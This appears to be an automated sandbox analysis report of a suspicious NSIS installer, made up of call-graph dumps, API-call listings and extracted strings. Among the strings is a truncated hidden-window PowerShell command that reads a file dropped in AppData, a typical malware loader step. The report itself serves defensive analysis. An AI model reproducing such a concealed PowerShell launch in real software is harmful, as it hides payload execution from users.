3242->3247 3248 4041ae 3242->3248 3249 40140b 2 API calls 3243->3249 3252 4042fe 3244->3252 3342 404668 3245->3342 3246->3245 3254 404186 ShowWindow 3246->3254 3302 40458a 3247->3302 3250 4041b3 SetWindowLongW 3248->3250 3251 4041c4 3248->3251 3249->3234 3250->3257 3251->3245 3255 4041d0 GetDlgItem 3251->3255 3252->3236 3256 404302 SendMessageW 3252->3256 3254->3242 3260 4041e1 SendMessageW IsWindowEnabled 3255->3260 3261 4041fe 3255->3261 3256->3257 3258 40140b 2 API calls 3269 404338 3258->3269 3259 40458c DestroyWindow EndDialog 3259->3302 3260->3257 3260->3261 3264 40420b 3261->3264 3266 404252 SendMessageW 3261->3266 3267 40421e 3261->3267 3276 404203 3261->3276 3262 4045bb ShowWindow 3262->3257 3264->3266 3264->3276 3266->3245 3270 404226 3267->3270 3271 40423b 3267->3271 3268 404239 3268->3245 3269->3257 3269->3258 3269->3259 3272 404601 22 API calls 3269->3272 3293 4044cc DestroyWindow 3269->3293 3306 4066bf 3269->3306 3323 404601 3269->3323 3336 40140b 3270->3336 3273 40140b 2 API calls 3271->3273 3272->3269 3275 404242 3273->3275 3275->3245 3275->3276 3339 4045da 3276->3339 3278 4043b3 GetDlgItem 3279 4043d0 ShowWindow KiUserCallbackDispatcher 3278->3279 3280 4043c8 3278->3280 3326 404623 KiUserCallbackDispatcher 3279->3326 3280->3279 3282 4043fa EnableWindow 3287 40440e 3282->3287 3283 404413 GetSystemMenu EnableMenuItem SendMessageW 3284 404443 SendMessageW 3283->3284 3283->3287 3284->3287 3287->3283 3327 404636 SendMessageW 3287->3327 3328 4040e3 3287->3328 3331 406682 lstrcpynW 3287->3331 3289 404472 lstrlenW 3290 4066bf 21 API calls 3289->3290 3291 404488 SetWindowTextW 3290->3291 3332 401389 3291->3332 3294 4044e6 CreateDialogParamW 3293->3294 3293->3302 3295 404519 3294->3295 3294->3302 3296 404601 22 API calls 3295->3296 3297 404524 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3296->3297 3298 401389 2 API calls 3297->3298 3299 40456a 3298->3299 3299->3257 3300 404572 ShowWindow 3299->3300 3301 40464d SendMessageW 3300->3301 3301->3302 3302->3257 3302->3262 3304 404665 3303->3304 3305 404656 SendMessageW 3303->3305 3304->3269 3305->3304 3321 4066ca 3306->3321 3307 406911 3308 40692a 3307->3308 3378 406682 lstrcpynW 3307->3378 3308->3269 3310 4068e2 lstrlenW 3310->3321 3314 4067db GetSystemDirectoryW 3314->3321 3315 4066bf 15 API calls 3315->3310 3316 4067f1 GetWindowsDirectoryW 3316->3321 3318 4066bf 15 API calls 3318->3321 3319 406883 lstrcatW 3319->3321 3321->3307 3321->3310 3321->3314 3321->3315 3321->3316 3321->3318 3321->3319 3322 406853 SHGetPathFromIDListW CoTaskMemFree 3321->3322 3356 406a76 GetModuleHandleA 3321->3356 3362 406550 3321->3362 3367 406930 3321->3367 3376 4065c9 wsprintfW 3321->3376 3377 406682 lstrcpynW 3321->3377 3322->3321 3324 4066bf 21 API calls 3323->3324 3325 40460c SetDlgItemTextW 3324->3325 3325->3278 3326->3282 3327->3287 3329 4066bf 21 API calls 3328->3329 3330 4040f1 SetWindowTextW 3329->3330 3330->3287 3331->3289 3334 401390 3332->3334 3333 4013fe 3333->3269 3334->3333 3335 4013cb MulDiv SendMessageW 3334->3335 3335->3334 3337 401389 2 API calls 3336->3337 3338 401420 3337->3338 3338->3276 3340 4045e1 3339->3340 3341 4045e7 SendMessageW 3339->3341 3340->3341 3341->3268 3343 40472b 3342->3343 3344 404680 GetWindowLongW 3342->3344 3343->3257 3344->3343 3345 404695 3344->3345 3345->3343 3346 4046c2 GetSysColor 3345->3346 3347 4046c5 3345->3347 3346->3347 3348 4046d5 SetBkMode 3347->3348 3349 4046cb SetTextColor 3347->3349 3350 4046f3 3348->3350 3351 4046ed GetSysColor 3348->3351 3349->3348 3352 4046fa SetBkColor 3350->3352 3353 404704 3350->3353 3351->3350 3352->3353 3353->3343 3354 404717 DeleteObject 3353->3354 3355 40471e CreateBrushIndirect 3353->3355 3354->3355 3355->3343 3357 406a92 3356->3357 3358 406a9c GetProcAddress 3356->3358 3379 406a06 GetSystemDirectoryW 3357->3379 3360 406aab 3358->3360 3360->3321 3361 406a98 3361->3358 3361->3360 3382 4064ef 3362->3382 3365 4065b4 3365->3321 3366 406584 RegQueryValueExW RegCloseKey 3366->3365 3368 40693d 3367->3368 3370 4069a6 CharNextW 3368->3370 3371 4069b3 3368->3371 3374 406992 CharNextW 3368->3374 3375 4069a1 CharNextW 3368->3375 3386 405f7e 3368->3386 3369 4069b8 CharPrevW 3369->3371 3370->3368 3370->3371 3371->3369 3372 4069d9 3371->3372 3372->3321 3374->3368 3375->3370 3376->3321 3377->3321 3378->3308 3380 406a28 wsprintfW LoadLibraryExW 3379->3380 3380->3361 3383 4064fe 3382->3383 3384 406502 3383->3384 3385 406507 RegOpenKeyExW 3383->3385 3384->3365 3384->3366 3385->3384 3387 405f84 3386->3387 3388 405f9a 3387->3388 3389 405f8b CharNextW 3387->3389 3388->3368 3389->3387 4560 401503 4561 401508 4560->4561 4563 401520 4560->4563 4562 402d89 21 API calls 4561->4562 4562->4563 4564 401a04 4565 402dab 21 API calls 4564->4565 4566 401a0b 4565->4566 4567 402dab 21 API calls 4566->4567 4568 401a14 4567->4568 4569 401a1b lstrcmpiW 4568->4569 4570 401a2d lstrcmpW 4568->4570 4571 401a21 4569->4571 4570->4571 4572 402304 4573 402dab 21 API calls 4572->4573 4574 40230a 4573->4574 4575 402dab 21 API calls 4574->4575 4576 402313 4575->4576 4577 402dab 21 API calls 4576->4577 4578 40231c 4577->4578 4579 4069df 2 API calls 4578->4579 4580 402325 4579->4580 4581 402336 lstrlenW lstrlenW 4580->4581 4585 402329 4580->4585 4583 405707 28 API calls 4581->4583 4582 405707 28 API calls 4586 402331 4582->4586 4584 402374 SHFileOperationW 4583->4584 4584->4585 4584->4586 4585->4582 4585->4586 4594 401d86 4595 401d99 GetDlgItem 4594->4595 4596 401d8c 4594->4596 4598 401d93 4595->4598 4597 402d89 21 API calls 4596->4597 4597->4598 4599 401dda GetClientRect LoadImageW SendMessageW 4598->4599 4600 402dab 21 API calls 4598->4600 4602 401e38 4599->4602 4604 401e44 4599->4604 4600->4599 4603 401e3d DeleteObject 4602->4603 4602->4604 4603->4604 4605 402388 4606 40238f 4605->4606 4609 4023a2 4605->4609 4607 4066bf 21 API calls 4606->4607 4608 40239c 4607->4608 4610 405ce2 MessageBoxIndirectW 4608->4610 4610->4609 4611 402c0a SendMessageW 4612 402c24 InvalidateRect 4611->4612 4613 402c2f 4611->4613 4612->4613 4614 40248f 4615 402dab 21 API calls 4614->4615 4616 4024a1 4615->4616 4617 402dab 21 API calls 4616->4617 4618 4024ab 4617->4618 4631 402e3b 4618->4631 4621 4024e3 4624 4024ef 4621->4624 4625 402d89 21 API calls 4621->4625 4622 402933 4623 402dab 21 API calls 4627 4024d9 lstrlenW 4623->4627 4626 40250e RegSetValueExW 4624->4626 4628 403376 48 API calls 4624->4628 4625->4624 4629 402524 RegCloseKey 4626->4629 4627->4621 4628->4626 4629->4622 4632 402e56 4631->4632 4635 40651d 4632->4635 4636 40652c 4635->4636 4637 4024bb 4636->4637 4638 406537 RegCreateKeyExW 4636->4638 4637->4621 4637->4622 4637->4623 4638->4637 4639 402910 4640 402dab 21 API calls 4639->4640 4641 402917 FindFirstFileW 4640->4641 4642 40292a 4641->4642 4643 40293f 4641->4643 4647 4065c9 wsprintfW 4643->4647 4645 402948 4648 406682 lstrcpynW 4645->4648 4647->4645 4648->4642 4649 401911 4650 401948 4649->4650 4651 402dab 21 API calls 4650->4651 4652 40194d 4651->4652 4653 405d8e 71 API calls 4652->4653 4654 401956 4653->4654 4655 401491 4656 405707 28 API calls 4655->4656 4657 401498 4656->4657 4658 403d12 4659 403d1d 4658->4659 4660 403d21 4659->4660 4661 403d24 GlobalAlloc 4659->4661 4661->4660 4669 401914 4670 402dab 21 API calls 4669->4670 4671 40191b 4670->4671 4672 405ce2 MessageBoxIndirectW 4671->4672 4673 401924 4672->4673 4674 402896 4675 40289d 4674->4675 4676 402bae 4674->4676 4677 402d89 21 API calls 4675->4677 4678 4028a4 4677->4678 4679 4028b3 SetFilePointer 4678->4679 4679->4676 4680 4028c3 4679->4680 4682 4065c9 wsprintfW 4680->4682 4682->4676 4683 401f17 4684 402dab 21 API calls 4683->4684 4685 401f1d 4684->4685 4686 402dab 21 API calls 4685->4686 4687 401f26 4686->4687 4688 402dab 21 API calls 4687->4688 4689 401f2f 4688->4689 4690 402dab 21 API calls 4689->4690 4691 401f38 4690->4691 4692 401423 28 API calls 4691->4692 4693 401f3f 4692->4693 4700 405ca8 ShellExecuteExW 4693->4700 4695 401f87 4696 406b21 5 API calls 4695->4696 4697 402933 4695->4697 4698 401fa4 CloseHandle 4696->4698 4698->4697 4700->4695 4701 402f98 4702 402faa SetTimer 4701->4702 4704 402fc3 4701->4704 4702->4704 4703 403011 4704->4703 4705 403017 MulDiv 4704->4705 4706 402fd1 wsprintfW SetWindowTextW SetDlgItemTextW 4705->4706 4706->4703 4708 401d1c 4709 402d89 21 API calls 4708->4709 4710 401d22 IsWindow 4709->4710 4711 401a25 4710->4711 4712 40149e 4713 4023a2 4712->4713 4714 4014ac PostQuitMessage 4712->4714 4714->4713 4715 401ba0 4716 401bf1 4715->4716 4720 401bad 4715->4720 4717 401c1b GlobalAlloc 4716->4717 4721 401bf6 4716->4721 4718 4066bf 21 API calls 4717->4718 4722 401c36 4718->4722 4719 4066bf 21 API calls 4723 40239c 4719->4723 4720->4722 4724 401bc4 4720->4724 4728 4023a2 4721->4728 4736 406682 lstrcpynW 4721->4736 4722->4719 4722->4728 4730 405ce2 MessageBoxIndirectW 4723->4730 4734 406682 lstrcpynW 4724->4734 4727 401c08 GlobalFree 4727->4728 4729 401bd3 4735 406682 lstrcpynW 4729->4735 4730->4728 4732 401be2 4737 406682 lstrcpynW 4732->4737 4734->4729 4735->4732 4736->4727 4737->4728 4738 406da0 4742 406c24 4738->4742 4739 40758f 4740 406ca5 GlobalFree 4741 406cae GlobalAlloc 4740->4741 4741->4739 4741->4742 4742->4739 4742->4740 4742->4741 4743 406d25 GlobalAlloc 4742->4743 4744 406d1c GlobalFree 4742->4744 4743->4739 4743->4742 4744->4743 4745 402621 4746 402dab 21 API calls 4745->4746 4747 402628 4746->4747 4750 406172 GetFileAttributesW CreateFileW 4747->4750 4749 402634 4750->4749 3401 4025a3 3413 402deb 3401->3413 3404 402d89 21 API calls 3405 4025b6 3404->3405 3406 4025c5 3405->3406 3410 402933 3405->3410 3407 4025d2 RegEnumKeyW 3406->3407 3408 4025de RegEnumValueW 3406->3408 3411 4025fa RegCloseKey 3407->3411 3409 4025f3 3408->3409 3408->3411 3409->3411 3411->3410 3418 402dab 3413->3418 3415 402e02 3416 4064ef RegOpenKeyExW 3415->3416 3417 4025ad 3416->3417 3417->3404 3419 402db7 3418->3419 3420 4066bf 21 API calls 3419->3420 3421 402dd8 3420->3421 3422 402de4 3421->3422 3423 406930 5 API calls 3421->3423 3422->3415 3423->3422 4751 4015a8 4752 402dab 21 API calls 4751->4752 4753 4015af SetFileAttributesW 4752->4753 4754 4015c1 4753->4754 4005 401fa9 4006 402dab 21 API calls 4005->4006 4007 401faf 4006->4007 4008 405707 28 API calls 4007->4008 4009 401fb9 4008->4009 4010 405c65 2 API calls 4009->4010 4011 401fbf 4010->4011 4012 402933 4011->4012 4019 401fe2 CloseHandle 4011->4019 4020 406b21 WaitForSingleObject 4011->4020 4015 401fd4 4016 401fe4 4015->4016 4017 401fd9 4015->4017 4016->4019 4025 4065c9 wsprintfW 4017->4025 4019->4012 4021 406b3b 4020->4021 4022 406b4d GetExitCodeProcess 4021->4022 4023 406ab2 2 API calls 4021->4023 4022->4015 4024 406b42 WaitForSingleObject 4023->4024 4024->4021 4025->4019 4762 404aab 4763 404ae1 4762->4763 4764 404abb 4762->4764 4766 404668 8 API calls 4763->4766 4765 404601 22 API calls 4764->4765 4767 404ac8 SetDlgItemTextW 4765->4767 4768 404aed 4766->4768 4767->4763 4026 40252f 4027 402deb 21 API calls 4026->4027 4028 402539 4027->4028 4029 402dab 21 API calls 4028->4029 4030 402542 4029->4030 4031 40254d RegQueryValueExW 4030->4031 4035 402933 4030->4035 4032 402573 RegCloseKey 4031->4032 4033 40256d 4031->4033 4032->4035 4033->4032 4037 4065c9 wsprintfW 4033->4037 4037->4032 4769 40202f 4770 402dab 21 API calls 4769->4770 4771 402036 4770->4771 4772 406a76 5 API calls 4771->4772 4773 402045 4772->4773 4774 402061 GlobalAlloc 4773->4774 4776 4020d1 4773->4776 4775 402075 4774->4775 4774->4776 4777 406a76 5 API calls 4775->4777 4778 40207c 4777->4778 4779 406a76 5 API calls 4778->4779 4780 402086 4779->4780 4780->4776 4784 4065c9 wsprintfW 4780->4784 4782 4020bf 4785 4065c9 wsprintfW 4782->4785 4784->4782 4785->4776 4786 4021af 4787 402dab 21 API calls 4786->4787 4788 4021b6 4787->4788 4789 402dab 21 API calls 4788->4789 4790 4021c0 4789->4790 4791 402dab 21 API calls 4790->4791 4792 4021ca 4791->4792 4793 402dab 21 API calls 4792->4793 4794 4021d4 4793->4794 4795 402dab 21 API calls 4794->4795 4796 4021de 4795->4796 4797 40221d CoCreateInstance 4796->4797 4798 402dab 21 API calls 4796->4798 4799 40223c 4797->4799 4798->4797 4800 401423 28 API calls 4799->4800 4801 4022fb 4799->4801 4800->4801 4802 401a35 4803 402dab 21 API calls 4802->4803 4804 401a3e ExpandEnvironmentStringsW 4803->4804 4805 401a52 4804->4805 4807 401a65 4804->4807 4806 401a57 lstrcmpW 4805->4806 4805->4807 4806->4807 3988 4023b7 3989 4023c5 3988->3989 3990 4023bf 3988->3990 3992 4023d3 3989->3992 3994 402dab 21 API calls 3989->3994 3991 402dab 21 API calls 3990->3991 3991->3989 3993 4023e1 3992->3993 3995 402dab 21 API calls 3992->3995 3996 402dab 21 API calls 3993->3996 3994->3992 3995->3993 3997 4023ea WritePrivateProfileStringW 3996->3997 4808 404737 lstrcpynW lstrlenW 4814 4014b8 4815 4014be 4814->4815 4816 401389 2 API calls 4815->4816 4817 4014c6 4816->4817 4818 402439 4819 402441 4818->4819 4820 40246c 4818->4820 4821 402deb 21 API calls 4819->4821 4822 402dab 21 API calls 4820->4822 4823 402448 4821->4823 4824 402473 4822->4824 4826 402480 4823->4826 4827 402dab 21 API calls 4823->4827 4829 402e69 4824->4829 4828 402459 RegDeleteValueW RegCloseKey 4827->4828 4828->4826 4830 402e7d 4829->4830 4831 402e76 4829->4831 4830->4831 4833 402eae 4830->4833 4831->4826 4834 4064ef RegOpenKeyExW 4833->4834 4835 402edc 4834->4835 4836 402f86 4835->4836 4837 402eec RegEnumValueW 4835->4837 4841 402f0f 4835->4841 4836->4831 4838 402f76 RegCloseKey 4837->4838 4837->4841 4838->4836 4839 402f4b RegEnumKeyW 4840 402f54 RegCloseKey 4839->4840 4839->4841 4842 406a76 5 API calls 4840->4842 4841->4838 4841->4839 4841->4840 4843 402eae 6 API calls 4841->4843 4844 402f64 4842->4844 4843->4841 4844->4836 4845 402f68 RegDeleteKeyW 4844->4845 4845->4836 4846 40173a 4847 402dab 21 API calls 4846->4847 4848 401741 SearchPathW 4847->4848 4849 40175c 4848->4849 4850 401d3d 4851 402d89 21 API calls 4850->4851 4852 401d44 4851->4852 4853 402d89 21 API calls 4852->4853 4854 401d50 GetDlgItem 4853->4854 4855 40263d 4854->4855

                                                      Executed Functions

                                                      Function 00403645 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 464stringfilecomCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 403645-403697 SetErrorMode GetVersionExW 1 4036d1-4036d6 0->1 2 403699-4036c9 GetVersionExW 0->2 3 4036d8 1->3 4 4036de-403720 1->4 2->1 3->4 5 403722-40372a call 406a76 4->5 6 403733 4->6 5->6 11 40372c 5->11 8 403738-40374c call 406a06 lstrlenA 6->8 13 40374e-40376a call 406a76 * 3 8->13 11->6 20 40377b-4037df #17 OleInitialize SHGetFileInfoW call 406682 GetCommandLineW call 406682 13->20 21 40376c-403772 13->21 28 4037e1-4037e3 20->28 29 4037e8-4037fc call 405f7e CharNextW 20->29 21->20 25 403774 21->25 25->20 28->29 32 4038f7-4038fd 29->32 33 403801-403807 32->33 34 403903 32->34 35 403810-403817 33->35 36 403809-40380e 33->36 37 403917-403931 GetTempPathW call 403614 34->37 38 403819-40381e 35->38 39 40381f-403823 35->39 36->35 36->36 47 403933-403951 GetWindowsDirectoryW lstrcatW call 403614 37->47 48 403989-4039a3 DeleteFileW call 4030d5 37->48 38->39 41 4038e4-4038f3 call 405f7e 39->41 42 403829-40382f 39->42 41->32 59 4038f5-4038f6 41->59 45 403831-403838 42->45 46 403849-403882 42->46 52 40383a-40383d 45->52 53 40383f 45->53 54 403884-403889 46->54 55 40389f-4038d9 46->55 47->48 62 403953-403983 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403614 47->62 64 403b90-403ba0 call 403c62 OleUninitialize 48->64 65 4039a9-4039af 48->65 52->46 52->53 53->46 54->55 61 40388b-403893 54->61 57 4038e1-4038e3 55->57 58 4038db-4038df 55->58 57->41 58->57 63 403905-403912 call 406682 58->63 59->32 66 403895-403898 61->66 67 40389a 61->67 62->48 62->64 63->37 77 403ba2-403bb2 call 405ce2 ExitProcess 64->77 78 403bc6-403bcc 64->78 70 4039b5-4039c0 call 405f7e 65->70 71 403a48-403a4f call 403d54 65->71 66->55 66->67 67->55 82 4039c2-4039f7 70->82 83 403a0e-403a18 70->83 80 403a54-403a58 71->80 84 403c4a-403c52 78->84 85 403bce-403be4 GetCurrentProcess OpenProcessToken 78->85 80->64 91 4039f9-4039fd 82->91 86 403a1a-403a28 call 406059 83->86 87 403a5d-403a83 call 405c4d lstrlenW call 406682 83->87 88 403c54 84->88 89 403c58-403c5c ExitProcess 84->89 92 403be6-403c14 LookupPrivilegeValueW AdjustTokenPrivileges 85->92 93 403c1a-403c28 call 406a76 85->93 86->64 106 403a2e-403a44 call 406682 * 2 86->106 110 403a94-403aac 87->110 111 403a85-403a8f call 406682 87->111 88->89 97 403a06-403a0a 91->97 98 4039ff-403a04 91->98 92->93 104 403c36-403c41 ExitWindowsEx 93->104 105 403c2a-403c34 93->105 97->91 99 403a0c 97->99 98->97 98->99 99->83 104->84 108 403c43-403c45 call 40140b 104->108 105->104 105->108 106->71 108->84 116 403ab1-403ab5 110->116 111->110 118 403aba-403ae4 wsprintfW call 4066bf 116->118 122 403ae6-403aeb call 405bd6 118->122 123 403aed call 405c30 118->123 127 403af2-403af4 122->127 123->127 128 403b30-403b4f SetCurrentDirectoryW call 406442 CopyFileW 127->128 129 403af6-403b00 GetFileAttributesW 127->129 137 403b51-403b72 call 406442 call 4066bf call 405c65 128->137 138 403b8e 128->138 130 403b21-403b2c 129->130 131 403b02-403b0b DeleteFileW 129->131 130->116 134 403b2e 130->134 131->130 133 403b0d-403b1f call 405d8e 131->133 133->118 133->130 134->64 146 403b74-403b7e 137->146 147 403bb8-403bc4 CloseHandle 137->147 138->64 146->138 148 403b80-403b88 call 4069df 146->148 147->138 148->118 148->138
                                                      APIs
                                                      • SetErrorMode.KERNELBASE ref: 00403668
                                                      • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403693
                                                      • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036A6
                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040373F
                                                      • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040377C
                                                      • OleInitialize.OLE32(00000000), ref: 00403783
                                                      • SHGetFileInfoW.SHELL32(00420F08,00000000,?,000002B4,00000000), ref: 004037A2
                                                      • GetCommandLineW.KERNEL32(00428A60,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037B7
                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe",00000020,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe",00000000,?,00000008,0000000A,0000000C), ref: 004037F0
                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403928
                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403939
                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403945
                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403961
                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403972
                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040397A
                                                      • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040398E
                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A67
                                                        • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                      • wsprintfW.USER32 ref: 00403AC4
                                                      • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 00403AF7
                                                      • DeleteFileW.KERNEL32(0042C800), ref: 00403B03
                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B31
                                                        • Part of subcall function 00406442: MoveFileExW.KERNEL32(?,?,00000005,00405F40,?,00000000,000000F1,?,?,?,?,?), ref: 0040644C
                                                      • CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403B47
                                                        • Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                        • Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                        • Part of subcall function 004069DF: FindFirstFileW.KERNELBASE(74DF3420,00425F98,00425750,004060A2,00425750,00425750,00000000,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0), ref: 004069EA
                                                        • Part of subcall function 004069DF: FindClose.KERNEL32(00000000), ref: 004069F6
                                                      • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B95
                                                      • ExitProcess.KERNEL32 ref: 00403BB2
                                                      • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403BB9
                                                      • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BD5
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BDC
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BF1
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C14
                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C39
                                                      • ExitProcess.KERNEL32 ref: 00403C5C
                                                        • Part of subcall function 00405C30: CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                      • String ID: "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"$"powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Gl$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238$C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                      • API String ID: 1813718867-2290975031
                                                      • Opcode ID: cb08dbe130f91360e7a1dfc8e1a880fb8121424293655edcd1d70ad09613bc60
                                                      • Instruction ID: d2a3103bd0adf94391fd0ebfa47e937d37e61a7cc597b22c14a72094b2238e17
                                                      • Opcode Fuzzy Hash: cb08dbe130f91360e7a1dfc8e1a880fb8121424293655edcd1d70ad09613bc60
                                                      • Instruction Fuzzy Hash: 4CF1E531604300AAD320AF759D05B2B7EE8AB8570AF11483FF585B22D1DB7C9A41CB6E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405846 Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 284windowclipboardmemoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 151 405846-405861 152 4059f0-4059f7 151->152 153 405867-40592e GetDlgItem * 3 call 404636 call 404f8f GetClientRect GetSystemMetrics SendMessageW * 2 151->153 155 405a21-405a2e 152->155 156 4059f9-405a1b GetDlgItem CreateThread FindCloseChangeNotification 152->156 171 405930-40594a SendMessageW * 2 153->171 172 40594c-40594f 153->172 157 405a30-405a36 155->157 158 405a4c-405a56 155->158 156->155 160 405a71-405a7a call 404668 157->160 161 405a38-405a47 ShowWindow * 2 call 404636 157->161 162 405a58-405a5e 158->162 163 405aac-405ab0 158->163 175 405a7f-405a83 160->175 161->158 168 405a60-405a6c call 4045da 162->168 169 405a86-405a96 ShowWindow 162->169 163->160 166 405ab2-405ab8 163->166 166->160 173 405aba-405acd SendMessageW 166->173 168->160 176 405aa6-405aa7 call 4045da 169->176 177 405a98-405aa1 call 405707 169->177 171->172 178 405951-40595d SendMessageW 172->178 179 40595f-405976 call 404601 172->179 180 405ad3-405afe CreatePopupMenu call 4066bf AppendMenuW 173->180 181 405bcf-405bd1 173->181 176->163 177->176 178->179 190 405978-40598c ShowWindow 179->190 191 4059ac-4059cd GetDlgItem SendMessageW 179->191 188 405b00-405b10 GetWindowRect 180->188 189 405b13-405b28 TrackPopupMenu 180->189 181->175 188->189 189->181 192 405b2e-405b45 189->192 193 40599b 190->193 194 40598e-405999 ShowWindow 190->194 191->181 195 4059d3-4059eb SendMessageW * 2 191->195 196 405b4a-405b65 SendMessageW 192->196 197 4059a1-4059a7 call 404636 193->197 194->197 195->181 196->196 198 405b67-405b8a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->191 200 405b8c-405bb3 SendMessageW 198->200 200->200 201 405bb5-405bc9 GlobalUnlock SetClipboardData CloseClipboard 200->201 201->181
                                                      APIs
